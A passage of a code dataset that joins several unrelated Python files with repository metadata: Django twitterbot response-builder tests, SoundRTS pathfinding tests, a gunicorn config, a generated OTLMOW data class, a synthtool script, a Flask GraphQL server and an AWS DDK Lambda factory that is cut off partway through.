invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
25
2018-07-20T22:31:40.000Z
2021-07-15T16:58:41.000Z
cpdb/twitterbot/tests/test_response_builders.py
invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
13
2018-06-18T23:08:47.000Z
2022-02-10T07:38:25.000Z
cpdb/twitterbot/tests/test_response_builders.py
invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
6
2018-05-17T21:59:43.000Z
2020-11-17T00:30:26.000Z
from django.test import TestCase from django.test.utils import override_settings from mock.mock import mock_open from robber import expect from mock import patch, Mock from twitterbot.response_builders import ( SingleOfficerResponseBuilder, CoaccusedPairResponseBuilder, BaseResponseBuilder, NotFoundResponseBuilder) from twitterbot.factories import ResponseTemplateFactory from twitterbot.models import ResponseTemplate from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory
37.868421
115
0.586022
from django.test import TestCase from django.test.utils import override_settings from mock.mock import mock_open from robber import expect from mock import patch, Mock from twitterbot.response_builders import ( SingleOfficerResponseBuilder, CoaccusedPairResponseBuilder, BaseResponseBuilder, NotFoundResponseBuilder) from twitterbot.factories import ResponseTemplateFactory from twitterbot.models import ResponseTemplate from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory class BaseResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() class DummyResponseBuilder(BaseResponseBuilder): response_type = 'single_officer' def get_variables_sets(self, entities, context): yield dict() self.builder_class = DummyResponseBuilder def test_build_with_round_robined_syntax(self): builder = self.builder_class() ResponseTemplateFactory(id=20, response_type='single_officer', syntax='temp1') ResponseTemplateFactory(id=21, response_type='single_officer', syntax='temp2') expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'def'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp2', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) def test_build_with_syntax_depend_on_right_response_type(self): builder = self.builder_class() ResponseTemplateFactory(response_type='single_officer', syntax='b') ResponseTemplateFactory(response_type='test', syntax='c') context = dict() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([{ 'source': (), 'tweet_content': 'b', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(context['responses_count']).to.eq(1) def test_build_with_truncating_user_name_if_tweet_content_longer_than_140_characters(self): builder = self.builder_class() ResponseTemplateFactory(response_type='single_officer', syntax='@{{user_name}} anything else') with patch('twitterbot.response_builders.len', return_value=150): first_built = list(builder.build(extra_variables={'user_name': 'abc'}))[0] tweet_content = first_built['tweet_content'] expect(tweet_content).to.eq('anything else') class SingleOfficerResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() @override_settings(DOMAIN='http://foo.co') def test_build(self): _mock_open = mock_open() with patch('twitterbot.handlers.open', _mock_open, create=True): officer1 = OfficerFactory(id=1, first_name='Jerome', last_name='Finnigan', allegation_count=3) officer1_doc = { 'id': officer1.id, 'full_name': officer1.full_name } officer2 = OfficerFactory(id=2, first_name='Raymond', last_name='Piwnicki') officer2_doc = { 'id': officer2.id, 'full_name': officer2.full_name } ResponseTemplateFactory( response_type='single_officer', syntax='@{{user_name}} {{officer.full_name}} has {{officer.allegation_count}} complaints') builder = SingleOfficerResponseBuilder() officers = [('source1', officer1_doc), ('source2', officer2_doc)] expect(list(builder.build(officers, {'user_name': 'abc'}))).to.eq([{ 'source': ('source1',), 'tweet_content': '@abc Jerome Finnigan has 3 complaints', 'url': 'http://foo.co/officer/1/', 'type': 'single_officer', 'entity': officer1_doc, 'officer1': None, 'officer2': None, 'coaccused': 0, }, { 'source': ('source2',), 'tweet_content': '@abc Raymond Piwnicki has 0 complaints', 'url': 'http://foo.co/officer/2/', 'type': 'single_officer', 'entity': officer2_doc, 'officer1': None, 'officer2': None, 'coaccused': 0, }]) class CoaccusedPairResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() def test_build(self): officer1 = OfficerFactory(first_name='Jerome', last_name='Finnigan') allegation = AllegationFactory() OfficerAllegationFactory(officer=officer1, allegation=allegation) officer1_doc = { 'id': officer1.id, 'full_name': officer1.full_name, 'complaints': 3 } officer2 = OfficerFactory(first_name='Raymond', last_name='Piwnicki') OfficerAllegationFactory(officer=officer2, allegation=allegation) officer2_doc = { 'id': officer2.id, 'full_name': officer2.full_name, 'complaints': 3 } officer3 = OfficerFactory(first_name='Jesse', last_name='Acosta') OfficerAllegationFactory(officer=officer3) officer3_doc = { 'id': officer3.id, 'full_name': officer3.full_name, 'complaints': 3 } ResponseTemplateFactory( response_type='coaccused_pair', syntax=( '@{{user_name}} {{officer1.full_name}} and {{officer2.full_name}} ' 'were co-accused in {{coaccused}} case' ) ) builder = CoaccusedPairResponseBuilder() expect(list(builder.build( [('source1', officer1_doc), ('source2', officer2_doc), ('source3', officer3_doc)], {'user_name': 'abc'})) ).to.eq([{ 'source': ('source1', 'source2'), 'tweet_content': '@abc Jerome Finnigan and Raymond Piwnicki were co-accused in 1 case', 'url': '', 'type': 'coaccused_pair', 'entity': None, 'officer1': officer1, 'officer2': officer2, 'coaccused': 1, }]) class NotFoundResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() ResponseTemplateFactory( response_type='not_found', syntax='Sorry, @{{user_name}}, the bot find nothing') def test_build_with_0_response(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, is_retweet_of_twitterbot=False, is_quoted_tweet_of_twitterbot=False) context = { 'response_count': 0, 'incoming_tweet': tweet } with self.settings(DOMAIN='http://foo.co'): expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([{ 'source': (), 'tweet_content': 'Sorry, @abc, the bot find nothing', 'url': 'http://foo.co', 'type': 'not_found', 'entity': None, 'officer1': None, 'officer2': None, 'coaccused': 0 }]) def test_build_with_response(self): builder = NotFoundResponseBuilder() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context={'responses_count': 1}))).to.eq([]) def test_do_nothing_if_retweet_of_twitterbot(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, is_retweet_of_twitterbot=True, is_quoted_tweet_of_twitterbot=False) context = { 'responses_count': 0, 'incoming_tweet': tweet } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_quoted_tweet_of_twitterbot(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, is_retweet_of_twitterbot=False, is_quoted_tweet_of_twitterbot=True) context = { 'responses_count': 0, 'incoming_tweet': tweet } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_there_is_no_incoming_tweet(self): builder = NotFoundResponseBuilder() context = { 'responses_count': 0, 'incoming_tweet': None } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_there_is_no_context(self): builder = NotFoundResponseBuilder() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=None))).to.eq([])
8,901
214
440
7f8b17757fa5f2876737685c8360f39e1e1cef47
1,357
py
Python
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
2
2019-12-29T16:18:10.000Z
2019-12-29T16:18:39.000Z
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
1
2018-02-17T10:41:18.000Z
2018-02-17T10:41:18.000Z
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
null
null
null
import unittest from soundrts.world import World from soundrts.mapfile import Map # print self.w.get_objects_string()[-160:] if __name__ == "__main__": unittest.main()
32.309524
82
0.608696
import unittest from soundrts.world import World from soundrts.mapfile import Map class WorldTestCase(unittest.TestCase): def setUp(self): self.w = World([]) self.w.load_and_build_map(Map("multi/m2.txt")) self.w2 = World([]) self.w2.load_and_build_map(Map("multi/jl2.txt")) def tearDown(self): pass def testShortestPath(self): g = self.w.grid self.assertEqual(g["a1"].shortest_path_distance_to(g["a2"]), g["a1"].shortest_path_distance_to(g["b1"])) self.assertIn( g["a1"].shortest_path_to(g["e5"]).other_side.place.name, ("a2", "b1")) self.assertEqual( g["b1"].shortest_path_to(g["e5"]).other_side.place.name, "b2") self.assertEqual( g["b1"].shortest_path_to(g["d2"]).other_side.place.name, "c1") g2 = self.w2.grid self.assertEqual(g2["a1"].shortest_path_to(g2["c1"]), None) self.assertEqual(g2["c1"].shortest_path_to(g2["a1"]), None) def testCheckString(self): World([]).get_digest() self.assertEqual(self.w.get_digest(), self.w.get_digest()) self.assertNotEqual(self.w.get_digest(), self.w2.get_digest()) self.w.get_objects_string() # print self.w.get_objects_string()[-160:] if __name__ == "__main__": unittest.main()
1,021
18
135
178c0c20dcc9abe86434ad86ea0996c5a40260ae
58
py
Python
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
workers = 2 worker_class = 'gevent' bind = "0.0.0.0:8888"
14.5
23
0.655172
workers = 2 worker_class = 'gevent' bind = "0.0.0.0:8888"
0
0
0
e8e0a0444c4be29eeeb8e912e2a2e9fbfd16637f
5,641
py
Python
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLClassPython
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
2
2022-02-01T08:58:11.000Z
2022-02-08T13:35:17.000Z
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLMOW
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
null
null
null
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLMOW
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
null
null
null
# coding=utf-8 from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut from OTLMOW.OTLModel.Classes.AIMObject import AIMObject from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument from OTLMOW.OTLModel.Datatypes.KlOverstortrandMateriaal import KlOverstortrandMateriaal from OTLMOW.OTLModel.Datatypes.KlVariabelDeelType import KlVariabelDeelType from OTLMOW.OTLModel.Datatypes.KwantWrdInMillimeter import KwantWrdInMillimeter from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie # Generated with OTLClassCreator. To modify: extend, do not edit class Overstortrand(AIMObject, VlakGeometrie): """Een overstortrand heeft als doel het afvoeren van (pieken in) overtollig rioolwater vanuit de gemengde riolering naar het oppervlaktewater.""" typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand' """De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.""" @property def breedte(self): """De afstand tussen de uiterste zijden van de overstortrand in millimeter.""" return self._breedte.get_waarde() @breedte.setter @property def hoogte(self): """De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.""" return self._hoogte.get_waarde() @hoogte.setter @property def materiaal(self): """Het materiaal waaruit de overstortrand vervaardigd is.""" return self._materiaal.get_waarde() @materiaal.setter @property def technischeFiche(self): """De technische fiche van de de overstortrand.""" return self._technischeFiche.get_waarde() @technischeFiche.setter @property def variabelDeelType(self): """Bepaalt het type van het variabel deel van de overstortrand.""" return self._variabelDeelType.get_waarde() @variabelDeelType.setter @property def wanddikte(self): """De wanddikte van de overstortrand in millimeter.""" return self._wanddikte.get_waarde() @wanddikte.setter
48.213675
149
0.593157
# coding=utf-8 from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut from OTLMOW.OTLModel.Classes.AIMObject import AIMObject from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument from OTLMOW.OTLModel.Datatypes.KlOverstortrandMateriaal import KlOverstortrandMateriaal from OTLMOW.OTLModel.Datatypes.KlVariabelDeelType import KlVariabelDeelType from OTLMOW.OTLModel.Datatypes.KwantWrdInMillimeter import KwantWrdInMillimeter from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie # Generated with OTLClassCreator. To modify: extend, do not edit class Overstortrand(AIMObject, VlakGeometrie): """Een overstortrand heeft als doel het afvoeren van (pieken in) overtollig rioolwater vanuit de gemengde riolering naar het oppervlaktewater.""" typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand' """De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.""" def __init__(self): AIMObject.__init__(self) VlakGeometrie.__init__(self) self._breedte = OTLAttribuut(field=KwantWrdInMillimeter, naam='breedte', label='breedte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.breedte', definition='De afstand tussen de uiterste zijden van de overstortrand in millimeter.', owner=self) self._hoogte = OTLAttribuut(field=KwantWrdInMillimeter, naam='hoogte', label='hoogte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.hoogte', definition='De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.', owner=self) self._materiaal = OTLAttribuut(field=KlOverstortrandMateriaal, naam='materiaal', label='materiaal', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.materiaal', definition='Het materiaal waaruit de overstortrand vervaardigd is.', owner=self) self._technischeFiche = OTLAttribuut(field=DtcDocument, naam='technischeFiche', label='technische fiche', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.technischeFiche', definition='De technische fiche van de de overstortrand.', owner=self) self._variabelDeelType = OTLAttribuut(field=KlVariabelDeelType, naam='variabelDeelType', label='variabel deel type', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.variabelDeelType', definition='Bepaalt het type van het variabel deel van de overstortrand.', owner=self) self._wanddikte = OTLAttribuut(field=KwantWrdInMillimeter, naam='wanddikte', label='wanddikte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.wanddikte', definition='De wanddikte van de overstortrand in millimeter.', owner=self) @property def breedte(self): """De afstand tussen de uiterste zijden van de overstortrand in millimeter.""" return self._breedte.get_waarde() @breedte.setter def breedte(self, value): self._breedte.set_waarde(value, owner=self) @property def hoogte(self): """De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.""" return self._hoogte.get_waarde() @hoogte.setter def hoogte(self, value): self._hoogte.set_waarde(value, owner=self) @property def materiaal(self): """Het materiaal waaruit de overstortrand vervaardigd is.""" return self._materiaal.get_waarde() @materiaal.setter def materiaal(self, value): self._materiaal.set_waarde(value, owner=self) @property def technischeFiche(self): """De technische fiche van de de overstortrand.""" return self._technischeFiche.get_waarde() @technischeFiche.setter def technischeFiche(self, value): self._technischeFiche.set_waarde(value, owner=self) @property def variabelDeelType(self): """Bepaalt het type van het variabel deel van de overstortrand.""" return self._variabelDeelType.get_waarde() @variabelDeelType.setter def variabelDeelType(self, value): self._variabelDeelType.set_waarde(value, owner=self) @property def wanddikte(self): """De wanddikte van de overstortrand in millimeter.""" return self._wanddikte.get_waarde() @wanddikte.setter def wanddikte(self, value): self._wanddikte.set_waarde(value, owner=self)
3,394
0
183
76fcb2603b88ccac0913fe789652456f73c7fa0b
209
py
Python
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
2
2019-02-19T08:42:32.000Z
2019-02-19T08:42:41.000Z
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
534
2019-11-15T02:30:56.000Z
2021-11-25T16:00:20.000Z
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
1
2019-01-14T16:18:36.000Z
2019-01-14T16:18:36.000Z
import synthtool as s import synthtool.gcp as gcp import logging logging.basicConfig(level=logging.DEBUG) common_templates = gcp.CommonTemplates() templates = common_templates.node_library() s.copy(templates)
26.125
43
0.832536
import synthtool as s import synthtool.gcp as gcp import logging logging.basicConfig(level=logging.DEBUG) common_templates = gcp.CommonTemplates() templates = common_templates.node_library() s.copy(templates)
0
0
0
5acb38c9155130c3e42b9f2df9274104a0876546
275
py
Python
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
2
2021-07-19T21:32:00.000Z
2021-07-28T20:47:44.000Z
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
null
null
null
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
null
null
null
from flask import Flask from flask_graphql import GraphQLView from schema import schema app = Flask(__name__) app.add_url_rule("/", view_func=GraphQLView.as_view("graphql", schema=schema, graphiql=True)) if __name__ == "__main__": app.run(debug=True)
22.916667
62
0.72
from flask import Flask from flask_graphql import GraphQLView from schema import schema app = Flask(__name__) app.add_url_rule("/", view_func=GraphQLView.as_view("graphql", schema=schema, graphiql=True)) if __name__ == "__main__": app.run(debug=True)
0
0
0
ac8b81faa9ffcb252fdc732dd62f427ed94c8fa0
10,156
py
Python
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
37
2022-02-21T19:06:35.000Z
2022-03-31T17:12:26.000Z
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
25
2022-02-22T15:13:31.000Z
2022-03-29T20:22:43.000Z
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
6
2022-02-21T19:07:01.000Z
2022-03-08T05:20:59.000Z
# Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from typing import Any, Dict, List, Optional import aws_cdk as cdk import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_lambda as lmb from aws_cdk.aws_iam import IRole, PolicyStatement from aws_cdk.aws_sqs import IQueue from aws_ddk_core.config import Config from aws_ddk_core.resources.commons import BaseSchema, Duration, SubnetType from constructs import Construct from marshmallow import ValidationError, fields _logger: logging.Logger = logging.getLogger(__name__) class FunctionSchema(BaseSchema): """DDK Lambda function Marshmallow schema.""" # Lambda function CDK construct fields dead_letter_queue_enabled = fields.Bool() memory_size = fields.Int(load_default=256) environment = fields.Dict(keys=fields.Str, values=fields.Str) profiling = fields.Bool() reserved_concurrent_executions = fields.Int() timeout = Duration(load_default=cdk.Duration.seconds(120)) tracing = fields.Method(deserialize="load_tracing") max_event_age = Duration() retry_attempts = fields.Int() allow_all_outbound = fields.Bool() allow_public_subnet = fields.Bool() # Config specific fields vpc_id = fields.Str(metadata={"config_only": True}) vpc_subnet_type = SubnetType(metadata={"config_only": True}) vpc_subnet_group_name = fields.Str(metadata={"config_only": True}) vpc_subnet_ids = fields.List(fields.Str(), metadata={"config_only": True}) security_group_ids = fields.List(fields.Str(), metadata={"config_only": True}) class LambdaFactory: """ Class factory to create and configure Lambda DDK resources, including Functions. """ @staticmethod def function( scope: Construct, id: str, environment_id: str, code: lmb.Code, handler: str, runtime: lmb.Runtime = lmb.Runtime.PYTHON_3_9, function_name: Optional[str] = None, description: Optional[str] = None, role: Optional[IRole] = None, dead_letter_queue_enabled: Optional[bool] = None, dead_letter_queue: Optional[IQueue] = None, memory_size: Optional[int] = None, timeout: Optional[cdk.Duration] = None, **function_props: Any, ) -> lmb.IFunction: """ Create and configure Lambda function. This construct allows to configure parameters of the function using ddk.json configuration file depending on the `environment_id` in which the function is used. Supported parameters are: `dead_letter_queue_enabled`,`memory_size`, `environment`, `profiling`, `reserved_concurrent_executions`, `timeout`, `tracing`, `max_event_age`, `retry_attempts`, `allow_all_outbound`, and `allow_public_subnet`. The parameters are respected in the following order: 1 - Explicit arguments are always preferred 2 - Values from configuration file 3 - Defaults are used otherwise Parameters ---------- scope : Construct Scope within which this construct is defined id : str Identifier of the Lambda function environment_id : str Identifier of the environment code : Code The source code of the Lambda function handler : str The name of the method within the code that Lambda calls to execute the function runtime : Runtime The runtime environment for the Lambda function function_name : Optional[str] The name of the Lambda function description : Optional[str] The description of the Lambda function role : Optional[IRole] Lambda execution role dead_letter_queue_enabled : Optional[bool] Determines if DLQ is enabled. `False` by default. dead_letter_queue : Optional[IQueue] The SQS queue to use if DLQ is enabled memory_size : Optional[int] The amount of memory, in MB, that is allocated to the Lambda function. `256` by default. timeout : Optional[Duration] The function execution time (in seconds) after which Lambda terminates the function. `aws_cdk.Duration.seconds(120)` by default. function_props : Any Additional function properties. For complete list of properties refer to CDK Documentation - Lambda Function: https://docs.aws.amazon.com/cdk/api/v2/python/aws_cdk.aws_lambda/Function.html Returns ------- fn : aws_cdk.aws_lambda.Function Lambda function """ # Load function configuration from ddk.json based on environment id and resource id function_config_dict: Dict[str, Any] = Config().get_resource_config( environment_id=environment_id, id=id, ) declared_fields = FunctionSchema().declared_fields.items() # Load CDK-only fields from schema function_construct_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if not field.metadata] ).load(function_config_dict, partial=["removal_policy"]) # Load config-only fields from schema function_config_only_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if field.metadata == {"config_only": True}] ).load(function_config_dict, partial=["removal_policy"]) # Set up networking function_construct_props["vpc"] = LambdaFactory._get_vpc( scope, id, vpc_id=function_config_only_props.get("vpc_id") ) function_construct_props["vpc_subnets"] = LambdaFactory._get_vpc_subnets( scope, id, vpc_subnet_ids=function_config_only_props.get("vpc_subnet_ids"), vpc_subnet_type=function_config_only_props.get("vpc_subnet_type"), vpc_subnet_group_name=function_config_only_props.get("vpc_subnet_group_name"), ) function_construct_props["security_groups"] = LambdaFactory._get_security_groups( scope, id, security_group_ids=function_config_only_props.get("security_group_ids") ) # Collect all explicit function arguments function_props = { "code": code, "handler": handler, "runtime": runtime, "role": role, "function_name": function_name, "description": description, "dead_letter_queue_enabled": dead_letter_queue_enabled, "dead_letter_queue": dead_letter_queue, "memory_size": memory_size, "timeout": timeout, **function_props, } # Explicit ("hardcoded") props should always take precedence over config for key, value in function_props.items(): if value is not None: function_construct_props[key] = value _logger.debug(f"function_construct_props: {function_construct_props}") # Create the function fn: lmb.IFunction = lmb.Function(scope, id, **function_construct_props) # Add IAM permissions if "vpc" in function_construct_props: LambdaFactory.add_vpc_permissions(fn) return fn @staticmethod @staticmethod @staticmethod @staticmethod
40.951613
114
0.652422
# Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from typing import Any, Dict, List, Optional import aws_cdk as cdk import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_lambda as lmb from aws_cdk.aws_iam import IRole, PolicyStatement from aws_cdk.aws_sqs import IQueue from aws_ddk_core.config import Config from aws_ddk_core.resources.commons import BaseSchema, Duration, SubnetType from constructs import Construct from marshmallow import ValidationError, fields _logger: logging.Logger = logging.getLogger(__name__) class FunctionSchema(BaseSchema): """DDK Lambda function Marshmallow schema.""" # Lambda function CDK construct fields dead_letter_queue_enabled = fields.Bool() memory_size = fields.Int(load_default=256) environment = fields.Dict(keys=fields.Str, values=fields.Str) profiling = fields.Bool() reserved_concurrent_executions = fields.Int() timeout = Duration(load_default=cdk.Duration.seconds(120)) tracing = fields.Method(deserialize="load_tracing") max_event_age = Duration() retry_attempts = fields.Int() allow_all_outbound = fields.Bool() allow_public_subnet = fields.Bool() def load_tracing(self, value: str) -> lmb.Tracing: tracings: Dict[str, lmb.Tracing] = lmb.Tracing._member_map_ try: return tracings[value.upper()] except KeyError as error: raise ValidationError(f"`tracing` value must be one of {tracings.values()}.") from error # Config specific fields vpc_id = fields.Str(metadata={"config_only": True}) vpc_subnet_type = SubnetType(metadata={"config_only": True}) vpc_subnet_group_name = fields.Str(metadata={"config_only": True}) vpc_subnet_ids = fields.List(fields.Str(), metadata={"config_only": True}) security_group_ids = fields.List(fields.Str(), metadata={"config_only": True}) class LambdaFactory: """ Class factory to create and configure Lambda DDK resources, including Functions. """ @staticmethod def function( scope: Construct, id: str, environment_id: str, code: lmb.Code, handler: str, runtime: lmb.Runtime = lmb.Runtime.PYTHON_3_9, function_name: Optional[str] = None, description: Optional[str] = None, role: Optional[IRole] = None, dead_letter_queue_enabled: Optional[bool] = None, dead_letter_queue: Optional[IQueue] = None, memory_size: Optional[int] = None, timeout: Optional[cdk.Duration] = None, **function_props: Any, ) -> lmb.IFunction: """ Create and configure Lambda function. This construct allows to configure parameters of the function using ddk.json configuration file depending on the `environment_id` in which the function is used. Supported parameters are: `dead_letter_queue_enabled`,`memory_size`, `environment`, `profiling`, `reserved_concurrent_executions`, `timeout`, `tracing`, `max_event_age`, `retry_attempts`, `allow_all_outbound`, and `allow_public_subnet`. The parameters are respected in the following order: 1 - Explicit arguments are always preferred 2 - Values from configuration file 3 - Defaults are used otherwise Parameters ---------- scope : Construct Scope within which this construct is defined id : str Identifier of the Lambda function environment_id : str Identifier of the environment code : Code The source code of the Lambda function handler : str The name of the method within the code that Lambda calls to execute the function runtime : Runtime The runtime environment for the Lambda function function_name : Optional[str] The name of the Lambda function description : Optional[str] The description of the Lambda function role : Optional[IRole] Lambda execution role dead_letter_queue_enabled : Optional[bool] Determines if DLQ is enabled. `False` by default. dead_letter_queue : Optional[IQueue] The SQS queue to use if DLQ is enabled memory_size : Optional[int] The amount of memory, in MB, that is allocated to the Lambda function. `256` by default. timeout : Optional[Duration] The function execution time (in seconds) after which Lambda terminates the function. `aws_cdk.Duration.seconds(120)` by default. function_props : Any Additional function properties. For complete list of properties refer to CDK Documentation - Lambda Function: https://docs.aws.amazon.com/cdk/api/v2/python/aws_cdk.aws_lambda/Function.html Returns ------- fn : aws_cdk.aws_lambda.Function Lambda function """ # Load function configuration from ddk.json based on environment id and resource id function_config_dict: Dict[str, Any] = Config().get_resource_config( environment_id=environment_id, id=id, ) declared_fields = FunctionSchema().declared_fields.items() # Load CDK-only fields from schema function_construct_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if not field.metadata] ).load(function_config_dict, partial=["removal_policy"]) # Load config-only fields from schema function_config_only_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if field.metadata == {"config_only": True}] ).load(function_config_dict, partial=["removal_policy"]) # Set up networking function_construct_props["vpc"] = LambdaFactory._get_vpc( scope, id, vpc_id=function_config_only_props.get("vpc_id") ) function_construct_props["vpc_subnets"] = LambdaFactory._get_vpc_subnets( scope, id, vpc_subnet_ids=function_config_only_props.get("vpc_subnet_ids"), vpc_subnet_type=function_config_only_props.get("vpc_subnet_type"), vpc_subnet_group_name=function_config_only_props.get("vpc_subnet_group_name"), ) function_construct_props["security_groups"] = LambdaFactory._get_security_groups( scope, id, security_group_ids=function_config_only_props.get("security_group_ids") ) # Collect all explicit function arguments function_props = { "code": code, "handler": handler, "runtime": runtime, "role": role, "function_name": function_name, "description": description, "dead_letter_queue_enabled": dead_letter_queue_enabled, "dead_letter_queue": dead_letter_queue, "memory_size": memory_size, "timeout": timeout, **function_props, } # Explicit ("hardcoded") props should always take precedence over config for key, value in function_props.items(): if value is not None: function_construct_props[key] = value _logger.debug(f"function_construct_props: {function_construct_props}") # Create the function fn: lmb.IFunction = lmb.Function(scope, id, **function_construct_props) # Add IAM permissions if "vpc" in function_construct_props: LambdaFactory.add_vpc_permissions(fn) return fn @staticmethod def _get_vpc(scope: Construct, id: str, vpc_id: Optional[str] = None) -> Optional[ec2.IVpc]: return ec2.Vpc.from_lookup(scope, f"{id}-{vpc_id}-vpc", vpc_id=vpc_id) if vpc_id else None @staticmethod def _get_vpc_subnets( scope: Construct, id: str, vpc_subnet_ids: Optional[List[str]] = 